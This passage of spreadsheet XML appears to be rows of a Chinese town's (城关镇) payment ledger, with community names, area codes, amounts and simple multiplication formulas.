    <row r="1079" ht="23" customHeight="1" spans="1:11">
      <c r="A1079" s="13" t="s">
        <v>2866</v>
      </c>
      <c r="B1079" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1079" s="14" t="s">
        <v>2071</v>
      </c>
      <c r="D1079" s="14" t="s">
        <v>2867</v>
      </c>
      <c r="E1079" s="14" t="s">
        <v>435</v>
      </c>
      <c r="F1079" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1079" s="14">
        <v>2</v>
      </c>
      <c r="H1079" s="14">
        <v>300</v>
      </c>
      <c r="I1079" s="14">
        <f t="shared" si="52"/>
        <v>600</v>
      </c>
      <c r="J1079" s="14">
        <v>45170</v>
      </c>
      <c r="K1079" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1080" ht="23" customHeight="1" spans="1:11">
      <c r="A1080" s="13" t="s">
        <v>2868</v>
      </c>
      <c r="B1080" s="14" t="str">
        <f>B1079</f>
        <v>城关镇</v>
      </c>
      <c r="C1080" s="14" t="str">
        <f>C1079</f>
        <v>西北社区</v>
      </c>
      <c r="D1080" s="15" t="s">
        <v>2869</v>
      </c>
      <c r="E1080" s="15" t="s">
        <v>269</v>
      </c>
      <c r="F1080" s="14" t="str">
        <f>F1079</f>
        <v>4113210108</v>
      </c>
      <c r="G1080" s="14"/>
      <c r="H1080" s="14"/>
      <c r="I1080" s="14"/>
      <c r="J1080" s="14"/>
      <c r="K1080" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1081" ht="23" customHeight="1" spans="1:11">
      <c r="A1081" s="13" t="s">
        <v>2870</v>
      </c>
      <c r="B1081" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1081" s="14" t="s">
        <v>2871</v>
      </c>
      <c r="D1081" s="14" t="s">
        <v>2872</v>
      </c>
      <c r="E1081" s="14" t="s">
        <v>2873</v>
      </c>
      <c r="F1081" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1081" s="14">
        <v>2</v>
      </c>
      <c r="H1081" s="14">
        <v>300</v>
      </c>
      <c r="I1081" s="14">
        <f>H1081*G1081</f>
        <v>600</v>
      </c>
      <c r="J1081" s="14">
        <v>45170</v>
      </c>
      <c r="K1081" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1082" ht="23" customHeight="1" spans="1:11">
      <c r="A1082" s="13" t="s">
        <v>2874</v>
      </c>
      <c r="B1082" s="14" t="str">
        <f>B1081</f>
        <v>城关镇</v>
      </c>
      <c r="C1082" s="14" t="str">
        <f>C1081</f>
        <v>医药局西北办理</v>
      </c>
      <c r="D1082" s="15" t="s">
        <v>2875</v>
      </c>
      <c r="E1082" s="15" t="s">
        <v>2876</v>
      </c>
      <c r="F1082" s="14" t="str">
        <f>F1081</f>
        <v>4113210108</v>
      </c>
      <c r="G1082" s="14"/>
      <c r="H1082" s="14"/>
      <c r="I1082" s="14"/>
      <c r="J1082" s="14"/>
      <c r="K1082" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1083" ht="23" customHeight="1" spans="1:11">
      <c r="A1083" s="13" t="s">
        <v>2877</v>
      </c>
      <c r="B1083" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1083" s="14" t="s">
        <v>2071</v>
      </c>
      <c r="D1083" s="14" t="s">
        <v>2878</v>
      </c>
      <c r="E1083" s="14" t="s">
        <v>2879</v>
      </c>
      <c r="F1083" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1083" s="14">
        <v>2</v>
      </c>
      <c r="H1083" s="14">
        <v>300</v>
      </c>
      <c r="I1083" s="14">
        <f>H1083*G1083</f>
        <v>600</v>
      </c>
      <c r="J1083" s="14">
        <v>45170</v>
      </c>
      <c r="K1083" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1084" ht="23" customHeight="1" spans="1:11">
      <c r="A1084" s="13" t="s">
        <v>2880</v>
      </c>
      <c r="B1084" s="14" t="str">
        <f>B1083</f>
        <v>城关镇</v>
      </c>
      <c r="C1084" s="14" t="str">
        <f>C1083</f>
        <v>西北社区</v>
      </c>
      <c r="D1084" s="15" t="s">
        <v>2881</v>
      </c>
      <c r="E1084" s="15" t="s">
        <v>2124</v>
      </c>
      <c r="F1084" s="14" t="str">
        <f>F1083</f>
        <v>4113210108</v>
      </c>
      <c r="G1084" s="14"/>
      <c r="H1084" s="14"/>
      <c r="I1084" s="14"/>
      <c r="J1084" s="14"/>
      <c r="K1084" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1085" ht="23" customHeight="1" spans="1:11">
      <c r="A1085" s="13" t="s">
        <v>2882</v>
      </c>
      <c r="B1085" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1085" s="14" t="s">
        <v>2883</v>
      </c>
      <c r="D1085" s="14" t="s">
        <v>2884</v>
      </c>
      <c r="E1085" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F1085" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1085" s="14">
        <v>1</v>
      </c>
      <c r="H1085" s="14">
        <v>340</v>
      </c>
      <c r="I1085" s="14">
        <f t="shared" ref="I1085:I1091" si="53">H1085*G1085</f>
        <v>340</v>
      </c>
      <c r="J1085" s="14">
        <v>45170</v>
      </c>
      <c r="K1085" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1086" ht="23" customHeight="1" spans="1:11">
      <c r="A1086" s="13" t="s">
        <v>2885</v>
      </c>
      <c r="B1086" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1086" s="14" t="s">
        <v>2886</v>
      </c>
      <c r="D1086" s="14" t="s">
        <v>2887</v>
      </c>
      <c r="E1086" s="14" t="s">
        <v>1774</v>
      </c>
      <c r="F1086" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1086" s="14">
        <v>1</v>
      </c>
      <c r="H1086" s="14">
        <v>340</v>
      </c>
      <c r="I1086" s="14">
        <f t="shared" si="53"/>
        <v>340</v>
      </c>
      <c r="J1086" s="14">
        <v>45170</v>
      </c>
      <c r="K1086" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1087" ht="23" customHeight="1" spans="1:11">
      <c r="A1087" s="13" t="s">
        <v>2888</v>
      </c>
      <c r="B1087" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1087" s="14" t="s">
        <v>2842</v>
      </c>
      <c r="D1087" s="14" t="s">
        <v>2889</v>
      </c>
      <c r="E1087" s="14" t="s">
        <v>1009</v>
      </c>
      <c r="F1087" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1087" s="14">
        <v>1</v>
      </c>
      <c r="H1087" s="14">
        <v>340</v>
      </c>
      <c r="I1087" s="14">
        <f t="shared" si="53"/>
        <v>340</v>
      </c>
      <c r="J1087" s="14">
        <v>45170</v>
      </c>
      <c r="K1087" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1088" ht="23" customHeight="1" spans="1:11">
      <c r="A1088" s="13" t="s">
        <v>2890</v>
      </c>
      <c r="B1088" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1088" s="14" t="s">
        <v>2891</v>
      </c>
      <c r="D1088" s="14" t="s">
        <v>2892</v>
      </c>
      <c r="E1088" s="14" t="s">
        <v>1685</v>
      </c>
      <c r="F1088" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1088" s="14">
        <v>1</v>
      </c>
      <c r="H1088" s="14">
        <v>340</v>
      </c>
      <c r="I1088" s="14">
        <f t="shared" si="53"/>
        <v>340</v>
      </c>
      <c r="J1088" s="14">
        <v>45170</v>
      </c>
      <c r="K1088" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1089" ht="23" customHeight="1" spans="1:11">
      <c r="A1089" s="13" t="s">
        <v>2893</v>
      </c>
      <c r="B1089" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1089" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D1089" s="14" t="s">
        <v>2894</v>
      </c>
      <c r="E1089" s="14" t="s">
        <v>502</v>
      </c>
      <c r="F1089" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1089" s="14">
        <v>1</v>
      </c>
      <c r="H1089" s="14">
        <v>340</v>
      </c>
      <c r="I1089" s="14">
        <f t="shared" si="53"/>
        <v>340</v>
      </c>
      <c r="J1089" s="14">
        <v>45170</v>
      </c>
      <c r="K1089" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1090" ht="23" customHeight="1" spans="1:11">
      <c r="A1090" s="13" t="s">
        <v>2895</v>
      </c>
      <c r="B1090" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1090" s="14" t="s">
        <v>2077</v>
      </c>
      <c r="D1090" s="14" t="s">
        <v>2896</v>
      </c>
      <c r="E1090" s="14" t="s">
        <v>303</v>
      </c>
      <c r="F1090" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G1090" s="14">
        <v>1</v>
      </c>
      <c r="H1090" s="14">
        <v>340</v>
      </c>
      <c r="I1090" s="14">
        <f t="shared" si="53"/>
        <v>340</v>
      </c>
      <c r="J1090" s="14">
        <v>45200</v>
      </c>
      <c r="K1090" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1091" ht="23" customHeight="1" spans="1:11">
      <c r="A1091" s="13" t="s">
        <v>2897</v>
      </c>
      <c r="B1091" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1091" s="14" t="s">
        <v>2898</v>
      </c>
      <c r="D1091" s="14" t="s">
        <v>2899</v>
      </c>
      <c r="E1091" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F1091" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1091" s="14">
        <v>2</v>
      </c>
      <c r="H1091" s="14">
        <v>300</v>
      </c>
      <c r="I1091" s="14">
        <f t="shared" si="53"/>
        <v>600</v>
      </c>
      <c r="J1091" s="14">
        <v>45200</v>
      </c>
      <c r="K1091" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1092" ht="23" customHeight="1" spans="1:11">
      <c r="A1092" s="13" t="s">
        <v>2900</v>
      </c>
      <c r="B1092" s="14" t="str">
        <f>B1091</f>
        <v>城关镇</v>
      </c>
      <c r="C1092" s="14" t="str">
        <f>C1091</f>
        <v>农业局（民主社区办理）</v>
      </c>
      <c r="D1092" s="15" t="s">
        <v>2901</v>
      </c>
      <c r="E1092" s="15" t="s">
        <v>2124</v>
      </c>
      <c r="F1092" s="14" t="str">
        <f>F1091</f>
        <v>4113210105</v>
      </c>
      <c r="G1092" s="14"/>
      <c r="H1092" s="14"/>
      <c r="I1092" s="14"/>
      <c r="J1092" s="14"/>
      <c r="K1092" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1093" ht="23" customHeight="1" spans="1:11">
      <c r="A1093" s="13" t="s">
        <v>2902</v>
      </c>
      <c r="B1093" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1093" s="14" t="s">
        <v>2903</v>
      </c>
      <c r="D1093" s="14" t="s">
        <v>2904</v>
      </c>
      <c r="E1093" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F1093" s="14">
        <v>4113210104</v>
      </c>
      <c r="G1093" s="14">
        <v>1</v>
      </c>
      <c r="H1093" s="14">
        <v>340</v>
      </c>
      <c r="I1093" s="14">
        <f>H1093*G1093</f>
        <v>340</v>
      </c>
      <c r="J1093" s="14">
        <v>45200</v>
      </c>
      <c r="K1093" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1094" ht="23" customHeight="1" spans="1:11">
      <c r="A1094" s="13" t="s">
        <v>2905</v>
      </c>
      <c r="B1094" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1094" s="14" t="s">
        <v>2906</v>
      </c>
      <c r="D1094" s="14" t="s">
        <v>1063</v>
      </c>
      <c r="E1094" s="14" t="s">
        <v>2907</v>
      </c>
      <c r="F1094" s="14">
        <v>4113210104</v>
      </c>
      <c r="G1094" s="14">
        <v>1</v>
      </c>
      <c r="H1094" s="14">
        <v>340</v>
      </c>
      <c r="I1094" s="14">
        <f>H1094*G1094</f>
        <v>340</v>
      </c>
      <c r="J1094" s="14">
        <v>45200</v>
      </c>
      <c r="K1094" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1095" ht="23" customHeight="1" spans="1:11">
      <c r="A1095" s="13" t="s">
        <v>2908</v>
      </c>
      <c r="B1095" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1095" s="14" t="s">
        <v>2906</v>
      </c>
      <c r="D1095" s="14" t="s">
        <v>2909</v>
      </c>
      <c r="E1095" s="14" t="s">
        <v>438</v>
      </c>
      <c r="F1095" s="14">
        <v>4113210104</v>
      </c>
      <c r="G1095" s="14">
        <v>2</v>
      </c>
      <c r="H1095" s="14">
        <v>300</v>
      </c>
      <c r="I1095" s="14">
        <f>H1095*G1095</f>
        <v>600</v>
      </c>
      <c r="J1095" s="14">
        <v>45200</v>
      </c>
      <c r="K1095" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1096" ht="23" customHeight="1" spans="1:11">
      <c r="A1096" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="B1096" s="14" t="str">
        <f>B1095</f>
        <v>城关镇</v>
      </c>
      <c r="C1096" s="14" t="str">
        <f>C1095</f>
        <v>二建（南外社区办理）</v>
      </c>
      <c r="D1096" s="15" t="s">
        <v>2911</v>
      </c>
      <c r="E1096" s="15" t="s">
        <v>2912</v>
      </c>
      <c r="F1096" s="14">
        <f>F1095</f>
        <v>4113210104</v>
      </c>
      <c r="G1096" s="14"/>
      <c r="H1096" s="14"/>
      <c r="I1096" s="14"/>
      <c r="J1096" s="14"/>
      <c r="K1096" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1097" ht="23" customHeight="1" spans="1:11">
      <c r="A1097" s="13" t="s">
        <v>2913</v>
      </c>
      <c r="B1097" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1097" s="14" t="s">
        <v>2914</v>
      </c>
      <c r="D1097" s="14" t="s">
        <v>2915</v>
      </c>
      <c r="E1097" s="14" t="s">
        <v>2916</v>
      </c>
      <c r="F1097" s="14">
        <v>4113210108</v>
      </c>
      <c r="G1097" s="14">
        <v>1</v>
      </c>
      <c r="H1097" s="14">
        <v>340</v>
      </c>
      <c r="I1097" s="14">
        <f>H1097*G1097</f>
        <v>340</v>
      </c>
      <c r="J1097" s="14">
        <v>45200</v>
      </c>
      <c r="K1097" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1098" ht="23" customHeight="1" spans="1:11">
      <c r="A1098" s="13" t="s">
        <v>2917</v>
      </c>
      <c r="B1098" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1098" s="14" t="s">
        <v>2918</v>
      </c>
      <c r="D1098" s="14" t="s">
        <v>2919</v>
      </c>
      <c r="E1098" s="14" t="s">
        <v>1082</v>
      </c>
      <c r="F1098" s="14">
        <v>4113210106</v>
      </c>
      <c r="G1098" s="14">
        <v>1</v>
      </c>
      <c r="H1098" s="14">
        <v>340</v>
      </c>
      <c r="I1098" s="14">
        <f>H1098*G1098</f>
        <v>340</v>
      </c>
      <c r="J1098" s="14">
        <v>45200</v>
      </c>
      <c r="K1098" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1099" ht="23" customHeight="1" spans="1:11">
      <c r="A1099" s="13" t="s">
        <v>2920</v>
      </c>
      <c r="B1099" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1099" s="14" t="s">
        <v>2921</v>
      </c>
      <c r="D1099" s="14" t="s">
        <v>2922</v>
      </c>
      <c r="E1099" s="14" t="s">
        <v>2923</v>
      </c>
      <c r="F1099" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1099" s="14">
        <v>1</v>
      </c>
      <c r="H1099" s="14">
        <v>340</v>
      </c>
      <c r="I1099" s="14">
        <f>H1099*G1099</f>
        <v>340</v>
      </c>
      <c r="J1099" s="14">
        <v>45231</v>
      </c>
      <c r="K1099" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1100" ht="23" customHeight="1" spans="1:11">
      <c r="A1100" s="13" t="s">
        <v>2924</v>
      </c>
      <c r="B1100" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1100" s="14" t="s">
        <v>2891</v>
      </c>
      <c r="D1100" s="14" t="s">
        <v>2925</v>
      </c>
      <c r="E1100" s="14" t="s">
        <v>323</v>
      </c>
      <c r="F1100" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1100" s="14">
        <v>1</v>
      </c>
      <c r="H1100" s="14">
        <v>340</v>
      </c>
      <c r="I1100" s="14">
        <f>H1100*G1100</f>
        <v>340</v>
      </c>
      <c r="J1100" s="14">
        <v>45231</v>
      </c>
      <c r="K1100" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1101" ht="23" customHeight="1" spans="1:11">
      <c r="A1101" s="13" t="s">
        <v>2926</v>
      </c>
      <c r="B1101" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1101" s="14" t="s">
        <v>2837</v>
      </c>
      <c r="D1101" s="14" t="s">
        <v>2927</v>
      </c>
      <c r="E1101" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F1101" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1101" s="14">
        <v>2</v>
      </c>
      <c r="H1101" s="14">
        <v>300</v>
      </c>
      <c r="I1101" s="14">
        <f>H1101*G1101</f>
        <v>600</v>
      </c>
      <c r="J1101" s="14">
        <v>45231</v>
      </c>
      <c r="K1101" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1102" ht="23" customHeight="1" spans="1:11">
      <c r="A1102" s="13" t="s">
        <v>2928</v>
      </c>
      <c r="B1102" s="14" t="str">
        <f>B1101</f>
        <v>城关镇</v>
      </c>
      <c r="C1102" s="14" t="str">
        <f>C1101</f>
        <v>外贸局中华办理</v>
      </c>
      <c r="D1102" s="15" t="s">
        <v>2929</v>
      </c>
      <c r="E1102" s="15" t="s">
        <v>2930</v>
      </c>
      <c r="F1102" s="14" t="str">
        <f>F1101</f>
        <v>4113210108</v>
      </c>
      <c r="G1102" s="14"/>
      <c r="H1102" s="14"/>
      <c r="I1102" s="14"/>
      <c r="J1102" s="14"/>
      <c r="K1102" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1103" ht="23" customHeight="1" spans="1:11">
      <c r="A1103" s="13" t="s">
        <v>2931</v>
      </c>
      <c r="B1103" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1103" s="14" t="s">
        <v>2932</v>
      </c>
      <c r="D1103" s="14" t="s">
        <v>2933</v>
      </c>
      <c r="E1103" s="14" t="s">
        <v>2934</v>
      </c>
      <c r="F1103" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1103" s="14">
        <v>2</v>
      </c>
      <c r="H1103" s="14">
        <v>350</v>
      </c>
      <c r="I1103" s="14">
        <f>H1103*G1103</f>
        <v>700</v>
      </c>
      <c r="J1103" s="14">
        <v>45231</v>
      </c>
      <c r="K1103" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1104" ht="23" customHeight="1" spans="1:11">
      <c r="A1104" s="13" t="s">
        <v>2935</v>
      </c>
      <c r="B1104" s="14" t="str">
        <f>B1103</f>
        <v>城关镇</v>
      </c>
      <c r="C1104" s="14" t="str">
        <f>C1103</f>
        <v>饮食服务公司中华办理</v>
      </c>
      <c r="D1104" s="15" t="s">
        <v>2936</v>
      </c>
      <c r="E1104" s="15" t="s">
        <v>2323</v>
      </c>
      <c r="F1104" s="14" t="str">
        <f>F1103</f>
        <v>4113210108</v>
      </c>
      <c r="G1104" s="14"/>
      <c r="H1104" s="14"/>
      <c r="I1104" s="14"/>
      <c r="J1104" s="14"/>
      <c r="K1104" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1105" ht="23" customHeight="1" spans="1:11">
      <c r="A1105" s="13" t="s">
        <v>2937</v>
      </c>
      <c r="B1105" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1105" s="14" t="s">
        <v>2938</v>
      </c>
      <c r="D1105" s="14" t="s">
        <v>2939</v>
      </c>
      <c r="E1105" s="14" t="s">
        <v>312</v>
      </c>
      <c r="F1105" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1105" s="14">
        <v>1</v>
      </c>
      <c r="H1105" s="14">
        <v>340</v>
      </c>
      <c r="I1105" s="14">
        <f>H1105*G1105</f>
        <v>340</v>
      </c>
      <c r="J1105" s="14">
        <v>45231</v>
      </c>
      <c r="K1105" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1106" ht="23" customHeight="1" spans="1:11">
      <c r="A1106" s="13" t="s">
        <v>2940</v>
      </c>
      <c r="B1106" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1106" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D1106" s="14" t="s">
        <v>2941</v>
      </c>
      <c r="E1106" s="14" t="s">
        <v>1107</v>
      </c>
      <c r="F1106" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1106" s="14">
        <v>1</v>
      </c>
      <c r="H1106" s="14">
        <v>340</v>
      </c>
      <c r="I1106" s="14">
        <f>H1106*G1106</f>
        <v>340</v>
      </c>
      <c r="J1106" s="14">
        <v>45231</v>
      </c>
      <c r="K1106" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1107" ht="23" customHeight="1" spans="1:11">
      <c r="A1107" s="13" t="s">
        <v>2942</v>
      </c>
      <c r="B1107" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1107" s="14" t="s">
        <v>2943</v>
      </c>
      <c r="D1107" s="14" t="s">
        <v>2944</v>
      </c>
      <c r="E1107" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F1107" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1107" s="14">
        <v>2</v>
      </c>
      <c r="H1107" s="14">
        <v>300</v>
      </c>
      <c r="I1107" s="14">
        <f>H1107*G1107</f>
        <v>600</v>
      </c>
      <c r="J1107" s="14">
        <v>45231</v>
      </c>
      <c r="K1107" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1108" ht="23" customHeight="1" spans="1:11">
      <c r="A1108" s="13" t="s">
        <v>2945</v>
      </c>
      <c r="B1108" s="14" t="str">
        <f>B1107</f>
        <v>城关镇</v>
      </c>
      <c r="C1108" s="14" t="str">
        <f>C1107</f>
        <v>剧团西北办理</v>
      </c>
      <c r="D1108" s="15" t="s">
        <v>2946</v>
      </c>
      <c r="E1108" s="15" t="s">
        <v>2947</v>
      </c>
      <c r="F1108" s="14" t="str">
        <f>F1107</f>
        <v>4113210108</v>
      </c>
      <c r="G1108" s="14"/>
      <c r="H1108" s="14"/>
      <c r="I1108" s="14"/>
      <c r="J1108" s="14"/>
      <c r="K1108" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1109" ht="23" customHeight="1" spans="1:11">
      <c r="A1109" s="13" t="s">
        <v>2948</v>
      </c>
      <c r="B1109" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1109" s="14" t="s">
        <v>2071</v>
      </c>
      <c r="D1109" s="14" t="s">
        <v>2949</v>
      </c>
      <c r="E1109" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F1109" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1109" s="14">
        <v>1</v>
      </c>
      <c r="H1109" s="14">
        <v>340</v>
      </c>
      <c r="I1109" s="14">
        <f>H1109*G1109</f>
        <v>340</v>
      </c>
      <c r="J1109" s="14">
        <v>45231</v>
      </c>
      <c r="K1109" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1110" ht="23" customHeight="1" spans="1:11">
      <c r="A1110" s="13" t="s">
        <v>2950</v>
      </c>
      <c r="B1110" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1110" s="14" t="s">
        <v>2071</v>
      </c>
      <c r="D1110" s="14" t="s">
        <v>2951</v>
      </c>
      <c r="E1110" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F1110" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1110" s="14">
        <v>2</v>
      </c>
      <c r="H1110" s="14">
        <v>300</v>
      </c>
      <c r="I1110" s="14">
        <f>H1110*G1110</f>
        <v>600</v>
      </c>
      <c r="J1110" s="14">
        <v>45231</v>
      </c>
      <c r="K1110" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1111" ht="23" customHeight="1" spans="1:11">
      <c r="A1111" s="13" t="s">
        <v>2952</v>
      </c>
      <c r="B1111" s="14" t="str">
        <f>B1110</f>
        <v>城关镇</v>
      </c>
      <c r="C1111" s="14" t="str">
        <f>C1110</f>
        <v>西北社区</v>
      </c>
      <c r="D1111" s="15" t="s">
        <v>2953</v>
      </c>
      <c r="E1111" s="15" t="s">
        <v>2596</v>
      </c>
      <c r="F1111" s="14" t="str">
        <f>F1110</f>
        <v>4113210108</v>
      </c>
      <c r="G1111" s="14"/>
      <c r="H1111" s="14"/>
      <c r="I1111" s="14"/>
      <c r="J1111" s="14"/>
      <c r="K1111" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1112" ht="23" customHeight="1" spans="1:11">
      <c r="A1112" s="13" t="s">
        <v>2954</v>
      </c>
      <c r="B1112" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1112" s="14" t="s">
        <v>2082</v>
      </c>
      <c r="D1112" s="14" t="s">
        <v>2955</v>
      </c>
      <c r="E1112" s="14" t="s">
        <v>249</v>
      </c>
      <c r="F1112" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1112" s="14">
        <v>1</v>
      </c>
      <c r="H1112" s="14">
        <v>340</v>
      </c>
      <c r="I1112" s="14">
        <f>H1112*G1112</f>
        <v>340</v>
      </c>
      <c r="J1112" s="14">
        <v>45231</v>
      </c>
      <c r="K1112" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1113" ht="23" customHeight="1" spans="1:11">
      <c r="A1113" s="13" t="s">
        <v>2956</v>
      </c>
      <c r="B1113" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1113" s="14" t="s">
        <v>2957</v>
      </c>
      <c r="D1113" s="14" t="s">
        <v>2958</v>
      </c>
      <c r="E1113" s="14" t="s">
        <v>2959</v>
      </c>
      <c r="F1113" s="14">
        <v>4113210107</v>
      </c>
      <c r="G1113" s="14">
        <v>1</v>
      </c>
      <c r="H1113" s="14">
        <v>340</v>
      </c>
      <c r="I1113" s="14">
        <f>H1113*G1113</f>
        <v>340</v>
      </c>
      <c r="J1113" s="14">
        <v>45261</v>
      </c>
      <c r="K1113" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1114" ht="23" customHeight="1" spans="1:11">
      <c r="A1114" s="13" t="s">
        <v>2960</v>
      </c>
      <c r="B1114" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1114" s="14" t="s">
        <v>2961</v>
      </c>
      <c r="D1114" s="14" t="s">
        <v>2962</v>
      </c>
      <c r="E1114" s="14" t="s">
        <v>400</v>
      </c>
      <c r="F1114" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1114" s="14">
        <v>1</v>
      </c>
      <c r="H1114" s="14">
        <v>340</v>
      </c>
      <c r="I1114" s="14">
        <f>H1114*G1114</f>
        <v>340</v>
      </c>
      <c r="J1114" s="14">
        <v>45261</v>
      </c>
      <c r="K1114" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1115" ht="23" customHeight="1" spans="1:11">
      <c r="A1115" s="13" t="s">
        <v>2963</v>
      </c>
      <c r="B1115" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1115" s="14" t="s">
        <v>2964</v>
      </c>
      <c r="D1115" s="14" t="s">
        <v>2965</v>
      </c>
      <c r="E1115" s="14" t="s">
        <v>2966</v>
      </c>
      <c r="F1115" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1115" s="14">
        <v>2</v>
      </c>
      <c r="H1115" s="14">
        <v>300</v>
      </c>
      <c r="I1115" s="14">
        <f>H1115*G1115</f>
        <v>600</v>
      </c>
      <c r="J1115" s="14">
        <v>45292</v>
      </c>
      <c r="K1115" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1116" ht="23" customHeight="1" spans="1:11">
      <c r="A1116" s="13" t="s">
        <v>2967</v>
      </c>
      <c r="B1116" s="14" t="str">
        <f>B1115</f>
        <v>城关镇</v>
      </c>
      <c r="C1116" s="14" t="str">
        <f>C1115</f>
        <v>法院（民主社区办理）</v>
      </c>
      <c r="D1116" s="21" t="s">
        <v>2968</v>
      </c>
      <c r="E1116" s="21" t="s">
        <v>2969</v>
      </c>
      <c r="F1116" s="14" t="str">
        <f>F1115</f>
        <v>4113210105</v>
      </c>
      <c r="G1116" s="14"/>
      <c r="H1116" s="14"/>
      <c r="I1116" s="14"/>
      <c r="J1116" s="14"/>
      <c r="K1116" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1117" ht="23" customHeight="1" spans="1:11">
      <c r="A1117" s="13" t="s">
        <v>2970</v>
      </c>
      <c r="B1117" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1117" s="14" t="s">
        <v>2971</v>
      </c>
      <c r="D1117" s="14" t="s">
        <v>2972</v>
      </c>
      <c r="E1117" s="14" t="s">
        <v>273</v>
      </c>
      <c r="F1117" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1117" s="14">
        <v>1</v>
      </c>
      <c r="H1117" s="14">
        <v>340</v>
      </c>
      <c r="I1117" s="14">
        <f>H1117*G1117</f>
        <v>340</v>
      </c>
      <c r="J1117" s="14">
        <v>45292</v>
      </c>
      <c r="K1117" s="14" t="s">
        <v>225</v>
      </c>
    </row>
